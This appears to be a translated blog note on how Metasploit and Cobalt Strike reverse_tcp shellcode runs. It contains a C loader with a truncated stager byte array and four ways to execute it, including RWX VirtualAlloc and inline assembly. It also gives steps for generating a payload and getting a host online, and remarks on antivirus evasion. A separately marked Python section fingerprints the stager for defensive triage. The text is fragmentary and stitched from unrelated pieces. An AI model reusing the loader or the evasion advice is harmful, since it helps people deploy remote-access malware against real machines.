Just having a look...
A brief analysis of how a Metasploit payload runs (what is the sockedi calling convention?)
lib/msf/core/payload/windows/reverse_tcp.rb:
Native:
MSF:
#include <Windows.h>
#include <stdio.h>
#include <string.h>
//#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") // build as a Windows-subsystem program so no black console window appears
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b"
/* ... (the remaining shellcode bytes are omitted in the original) ... */
"\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";
int main()
{
    // Four ways to run it, pick one at random (all of them end up GG)
    // 1. cast the byte array to a function pointer and call it directly
    ((void(WINAPI*)(void))&buf)();
    // 2. copy into freshly allocated RWX memory and call that
    //char* Memory;
    //Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    //memcpy(Memory, buf, sizeof(buf));
    //((void(*)())Memory)();
    // 3. inline asm: load the address and call it
    //__asm {
    //    lea eax, buf
    //    call eax
    //}
    // 4. inline asm: load the address and emit the raw bytes of jmp eax
    //__asm {
    //    mov eax, offset buf
    //    _emit 0xFF   // jmp eax
    //    _emit 0xE0
    //}
}
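The C array above is the raw reverse_tcp stager, and two pieces of it are recognisable even in the truncated listing: the block_api prologue at the start (cld; call; pushad; xor edx,edx; mov edx,[fs:edx+0x30]) and the exit sequence at the end (mov ebx, hash; push 0; push ebx; call ebp). The following added example, which is not from the original post or from Metasploit, parses that "unsigned char buf[]" format and fingerprints both fragments, which is what a defender reviewing a suspected loader's source would want; the sample blob is constructed (only the opening and closing bytes quoted on this page are real, the middle is NOP filler) and the hash-to-name table is Metasploit's known block_api values, not something taken from this page.

```python
import re
import struct

# Constructed sample in the "unsigned char buf[]" form that msfvenom and CS emit.
# Only the opening 14 and closing 15 bytes are the ones quoted on this page;
# the middle of the real stager is replaced here by NOP filler.
SAMPLE_C = r'''
unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b"
"\x90\x90\x90\x90"
"\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";
'''

# Metasploit block_api ror13 hashes of "kernel32.dll" + function name used by
# the stager's exit sequence (known Metasploit values, not from this page).
EXIT_HASHES = {0x56A2B5F0: "kernel32!ExitProcess", 0x0A2A1DE0: "kernel32!ExitThread"}

# cld; call rel32; pushad; xor edx,edx; mov edx,[fs:edx+0x30]  (start walking the PEB)
BLOCK_API_PROLOGUE = re.compile(rb"\xfc\xe8....\x60\x31\xd2\x64\x8b\x52\x30", re.DOTALL)
# mov ebx, imm32; push 0; push ebx; call ebp  (call the hashed exit function)
EXIT_SEQUENCE = re.compile(rb"\xbb(....)\x6a\x00\x53\xff\xd5", re.DOTALL)


def parse_c_array(src: str) -> bytes:
    """Concatenate every "\\x.." string-literal fragment in the C source into raw bytes."""
    frags = re.findall(r'"((?:\\x[0-9a-fA-F]{2})*)"', src)
    return bytes(int(h, 16) for frag in frags for h in re.findall(r"\\x([0-9a-fA-F]{2})", frag))

def find_block_api_prologue(code: bytes):
    """Offset of the block_api stager prologue, or None if it is absent."""
    m = BLOCK_API_PROLOGUE.search(code)
    return m.start() if m else None

def find_exit_call(code: bytes):
    """(hash, name) of the exit-function call, or None if the sequence is absent."""
    m = EXIT_SEQUENCE.search(code)
    if not m:
        return None
    h = struct.unpack("<I", m.group(1))[0]  # the hash is stored little-endian
    return h, EXIT_HASHES.get(h, "unknown")

def triage(src: str) -> dict:
    """Summarise what a suspected loader's embedded C array contains."""
    code = parse_c_array(src)
    return {"length": len(code), "block_api_at": find_block_api_prologue(code),
            "exit_call": find_exit_call(code)}
```

On the sample, triage reports the prologue at offset 0 and an exit call resolving to kernel32!ExitProcess, which is the same pattern a YARA rule for an unencoded MSF stager keys on.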
CS:
CS -- create a listener -- generate the C payload -- replace the payload in the source -- compile and run -- the host comes online
What is the principle behind it?
Shellcode generation
msf / cs
Compile the shellcode into an exe with C/C++ to bring the host online
shellcode: many AV-evasion techniques -- low chance of breaking it -- more room for customisation
executable file: a single AV-evasion technique -- high chance of breaking it
MSF source location: reverse_tcp.rb
The shellcode's come-online logic in the source